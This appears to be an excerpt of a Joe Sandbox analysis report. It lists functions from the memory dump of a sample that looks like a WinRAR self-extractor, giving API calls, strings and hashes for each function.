Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 3146aeb944da9b68c180ed4525f02941ef99679c6480f15412a91468c57a12f0
Instruction ID: e6ef4b5deadbd233d5db32dcd564e0449979de47874d0034eed5b2596f10e1dd
Opcode Fuzzy Hash: 3146aeb944da9b68c180ed4525f02941ef99679c6480f15412a91468c57a12f0
Instruction Fuzzy Hash: 0131F875118306ABC700DFA8D88499BB7F8BF98754F009A1EF999D3210E730D519CBAA

Function 00242AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00242AF1,002402FC,0023FA34), ref: 00242B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00242B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00242B2F
SetLastError.KERNEL32(00000000,00242AF1,002402FC,0023FA34), ref: 00242B81

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0acda19f565756dad809603db86bee23e03dcb249abcc9c078c3c9ccac830104
Instruction ID: f407b4b248fb656bf0adac9df7189f5f1c8d4fb9e1ce828dbae09f2d2aa1203c
Opcode Fuzzy Hash: 0acda19f565756dad809603db86bee23e03dcb249abcc9c078c3c9ccac830104
Instruction Fuzzy Hash: F3012432239712EEAA1C2E767C89A2A2F59EF457BA7E0033AF110540E0EF714D249908

Function 002497E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00261098,00244674,00261098,?,?,002440EF,?,?,00261098), ref: 002497E9
_free.LIBCMT ref: 0024981C
_free.LIBCMT ref: 00249844
SetLastError.KERNEL32(00000000,?,00261098), ref: 00249851
SetLastError.KERNEL32(00000000,?,00261098), ref: 0024985D
_abort.LIBCMT ref: 00249863

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 33573301fef1dcd2f07b21d1b0770e7e42ec4a51cd1de502c934d0049dd46358
Instruction ID: af1fcd4fc8290eea0421c09324cb0d456506d81f7352aab50e9691e3ae715ecd
Opcode Fuzzy Hash: 33573301fef1dcd2f07b21d1b0770e7e42ec4a51cd1de502c934d0049dd46358
Instruction Fuzzy Hash: 35F02835171702A6C71E7B387C0EA2F2A6A8FE2772F210134F628921D2FE70C8714929

Function 0023DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0023DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0023DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0023DC72
TranslateMessage.USER32(?), ref: 0023DC7C
DispatchMessageW.USER32(?), ref: 0023DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0023DC91

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: e0b8c4d75cb95fe4f9f755652eac759f9926f505552828c77d381b872a9ae9b3
Instruction ID: 22ba95564352a1015bee5f0adef01e05c5f5e0cb7c05412a7421b7fe9cbe451e
Opcode Fuzzy Hash: e0b8c4d75cb95fe4f9f755652eac759f9926f505552828c77d381b872a9ae9b3
Instruction Fuzzy Hash: 3FF03C72A11219BBCB20ABA5FC4CDCB7FBDEF42B91F004511B50AD2051D6759646C7A0

Function 0023A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0023A699: GetDC.USER32(00000000), ref: 0023A69D
Part of subcall function 0023A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0023A6A8
Part of subcall function 0023A699: ReleaseDC.USER32(00000000,00000000), ref: 0023A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0023A83C

Part of subcall function 0023AAC9: GetDC.USER32(00000000), ref: 0023AAD2
Part of subcall function 0023AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0023AB01
Part of subcall function 0023AAC9: ReleaseDC.USER32(00000000,?), ref: 0023AB99

Strings

A#, xrefs: 0023A9BA
(, xrefs: 0023A9AA
"#, xrefs: 0023A89D, 0023AAB9

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: "#$($A#
API String ID: 1061551593-562197573
Opcode ID: 7bcb1ab413257751de97be5025e6f9fda51afe0372623c0883a2e35039d93bda
Instruction ID: e54bc964221dcb8c2643c2f4c1336f8d5b73e29968280d22f42ab431ae4748e2
Opcode Fuzzy Hash: 7bcb1ab413257751de97be5025e6f9fda51afe0372623c0883a2e35039d93bda
Instruction Fuzzy Hash: AF91F2B5214751AFD610DF25D848A2BBBF8FFC9701F00492EF99AD3220DB70A905CB62

Function 0022C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 002305DA: _wcslen.LIBCMT ref: 002305E0

Part of subcall function 0022B92D: _wcsrchr.LIBVCRUNTIME ref: 0022B944

_wcslen.LIBCMT ref: 0022C197
_wcslen.LIBCMT ref: 0022C1DF

Strings

.exe, xrefs: 0022C10B
.sfx, xrefs: 0022C11A
.rar, xrefs: 0022C0E1, 0022C134

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: e2dfe16ee27952d9f260ef0609004a55e132c02474f24f74c9fbc2e8f19eeff1
Instruction ID: ddefe04dea41f189e34419df2f0299105ea19671c27af1d28a4b1840cea89743
Opcode Fuzzy Hash: e2dfe16ee27952d9f260ef0609004a55e132c02474f24f74c9fbc2e8f19eeff1
Instruction Fuzzy Hash: 8D414821530372B5C736AFB4A852A7E73A8EF41744F30050EF9866B081EFA15EB1C7A5

Function 0022BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0022BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0022A275,?,?,00000800,?,0022A23A,?,0022755C), ref: 0022BBC5
_wcslen.LIBCMT ref: 0022BC3B

Strings

UNC, xrefs: 0022BBA7
\\?\, xrefs: 0022BB52, 0022BB99, 0022BBF7, 0022BC4E

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 44e0d1657209f0dd97676b285447a8e56ec33bbd3fa85e0e12ccec3290f454c5
Instruction ID: a65bdcf109fffb16eb792124c4fb87ad5dcedb464a332a0089a8896294dea0cf
Opcode Fuzzy Hash: 44e0d1657209f0dd97676b285447a8e56ec33bbd3fa85e0e12ccec3290f454c5
Instruction Fuzzy Hash: 8941B471420226BACF23AFA0EC42EEE776DAF45391F544467F855A3151DB70EEB08E60

Function 0023CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0023CD84

Part of subcall function 0023AF98: _wcschr.LIBVCRUNTIME ref: 0023B033

Part of subcall function 00231FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0022C116,00000000,.exe,?,?,00000800,?,?,?,00238E3C), ref: 00231FD1

Strings

MAX, xrefs: 0023CDD9
HIDE, xrefs: 0023CDC6
MIN, xrefs: 0023CDF5
<, xrefs: 0023CD68

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: 1dc6d130d63789a39eb823a198718da613219895959867342960146ded46ad66
Instruction ID: 7631d71ffb9d208a6eac142c2fbf2ee790b3c4e48680d5a7271aec79770ecfbd
Opcode Fuzzy Hash: 1dc6d130d63789a39eb823a198718da613219895959867342960146ded46ad66
Instruction Fuzzy Hash: 193169B191021A9ADF25DF50DC45EEE73BCEB15350F5041A6F905F7180EBB09E948F51

Function 0022B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0022B9B8

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

_wcschr.LIBVCRUNTIME ref: 0022B9D6
_wcschr.LIBVCRUNTIME ref: 0022B9E6

Strings

%c:\, xrefs: 0022B9AE

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: bee4d23693fcc856f39da3b7e7d0e0e7538c00b96fac21c34f884d479f693537
Instruction ID: 305c6fca0a553a3fcb09b889d3a415e504202dcea69806a2748379b798b661f7
Opcode Fuzzy Hash: bee4d23693fcc856f39da3b7e7d0e0e7538c00b96fac21c34f884d479f693537
Instruction Fuzzy Hash: 4B014963130322799A35ABB6AC45D2BB39CEE95770B40440AF544D6082EB20E47486B1

Function 0023B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00221316: GetDlgItem.USER32(00000000,00003021), ref: 0022135A
Part of subcall function 00221316: SetWindowTextW.USER32(00000000,002535F4), ref: 00221370

EndDialog.USER32(?,00000001), ref: 0023B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0023B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0023B304

Strings

xz', xrefs: 0023B2E2
GETPASSWORD1, xrefs: 0023B289

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xz'
API String ID: 445417207-3069212304
Opcode ID: dffcfa45143cf4e0ae287b3a52600f9506903e06ccd6ba1074cc54b98f6ba1bd
Instruction ID: a03b427301c6f593c7b78a7fd7dc434b65d0a14e3d08658d786db6bc080db55b
Opcode Fuzzy Hash: dffcfa45143cf4e0ae287b3a52600f9506903e06ccd6ba1074cc54b98f6ba1bd
Instruction Fuzzy Hash: F711E172920129B6DB22DEB4AD49FFF376CEB19B00F000160FB46B2180C7A09A2487A1

Function 0023B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0023B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0023B712
DeleteObject.GDI32(00000000), ref: 0023B744
DeleteObject.GDI32(00000000), ref: 0023B767

Part of subcall function 0023A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0023B73D,00000066), ref: 0023A6D5
Part of subcall function 0023A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0023B73D,00000066), ref: 0023A6EC
Part of subcall function 0023A6C2: LoadResource.KERNEL32(00000000,?,?,?,0023B73D,00000066), ref: 0023A703
Part of subcall function 0023A6C2: LockResource.KERNEL32(00000000,?,?,?,0023B73D,00000066), ref: 0023A712
Part of subcall function 0023A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0023B73D,00000066), ref: 0023A72D
Part of subcall function 0023A6C2: GlobalLock.KERNEL32(00000000), ref: 0023A73E
Part of subcall function 0023A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0023A762
Part of subcall function 0023A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0023A7A7
Part of subcall function 0023A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0023A7C6
Part of subcall function 0023A6C2: GlobalFree.KERNEL32(00000000), ref: 0023A7CD

Strings

], xrefs: 0023B71A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 6aa22f4f45225cf061ccc14989ecd8cb49399c7bb75ef5fc6d67ec26210834ff
Instruction ID: e4148428afb47d1450797eb84ed4bbf7dff0ba59ef7e9daa85f1b509e0ae0e1c
Opcode Fuzzy Hash: 6aa22f4f45225cf061ccc14989ecd8cb49399c7bb75ef5fc6d67ec26210834ff
Instruction Fuzzy Hash: 5701D6B791010267CB12BF749C4EA7FBA7DEFC0B52F080020FA40B7291DF618D254A61

Function 0023D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00221316: GetDlgItem.USER32(00000000,00003021), ref: 0022135A
Part of subcall function 00221316: SetWindowTextW.USER32(00000000,002535F4), ref: 00221370

EndDialog.USER32(?,00000001), ref: 0023D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0023D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0023D675
SetDlgItemTextW.USER32(?,00000068), ref: 0023D684

Strings

RENAMEDLG, xrefs: 0023D618

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 8748543ce228b6e27f17438b6a5f73806da8bb3e499e09b31f70d7c953e7b89e
Instruction ID: a530e45357552b20ef2d449fdd3d4f2c659af457064bb5a3eb83e357be4a4459
Opcode Fuzzy Hash: 8748543ce228b6e27f17438b6a5f73806da8bb3e499e09b31f70d7c953e7b89e
Instruction Fuzzy Hash: 330128733A9211BBD2118F64BE0EF57776DFB9AF01F110015F309A60D4C6A2A9248F75

Function 00247E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00247E24,?,?,00247DC4,?,0025C300,0000000C,00247F1B,?,00000002), ref: 00247E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00247EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00247E24,?,?,00247DC4,?,0025C300,0000000C,00247F1B,?,00000002,00000000), ref: 00247EC9

Strings

CorExitProcess, xrefs: 00247E9E
mscoree.dll, xrefs: 00247E8C

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b2eaa0d3831393d2c04a4c83d6b41e4dabec14e17bb57e188512e12b67a553a4
Instruction ID: 43e0366f0ebd4951701a42c8a154fcb19c52bfdaa9574fb36e4b9e8ddb17813e
Opcode Fuzzy Hash: b2eaa0d3831393d2c04a4c83d6b41e4dabec14e17bb57e188512e12b67a553a4
Instruction Fuzzy Hash: C7F04F31A10309BBDB15DFA0EC0DB9EBFB5EB44756F0041A9FC05A22A0DB309E54CA98

Function 0022F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0023081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00230836
Part of subcall function 0023081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0022F2D8,Crypt32.dll,00000000,0022F35C,?,?,0022F33E,?,?,?), ref: 00230858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0022F2E4
GetProcAddress.KERNEL32(002681C8,CryptUnprotectMemory), ref: 0022F2F4

Strings

CryptProtectMemory, xrefs: 0022F2DE
CryptUnprotectMemory, xrefs: 0022F2EA
Crypt32.dll, xrefs: 0022F2CE

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 5d8ad0671cbfbb68a56051246e7ad7970b699a11942bd602aba5f7f0f243189e
Instruction ID: 0fe42d5b578393fca8c728d9416d8ce7ba56a2d83c3d82c0fa1624bf8052c79e
Opcode Fuzzy Hash: 5d8ad0671cbfbb68a56051246e7ad7970b699a11942bd602aba5f7f0f243189e
Instruction Fuzzy Hash: BEE02671830712AEC720DF78A84CB027AE46F15741F00982DF4CA93680CBB0D4608B14

Function 00242BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00242CA1
___AdjustPointer.LIBCMT ref: 00242CC4
_abort.LIBCMT ref: 00242D12
___AdjustPointer.LIBCMT ref: 00242D60

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 2ae761b9cfb0b990db3490e54dbc9a44010641f3487a0c7d744b0ac554a7ba27
Instruction ID: bb8a62f157d0e4c9fd9d84db183caf44832a9bcb71e7fea6b58af7237e29a3c2
Opcode Fuzzy Hash: 2ae761b9cfb0b990db3490e54dbc9a44010641f3487a0c7d744b0ac554a7ba27
Instruction Fuzzy Hash: 4651D071920212EFDB2D8F16D885B7A77A4FF54300F64402AFC01875A1D771ADA8DB90

Function 0024BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0024BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024BF5C

Part of subcall function 00248E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00244286,?,0000015D,?,?,?,?,00245762,000000FF,00000000,?,?), ref: 00248E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0024BF82
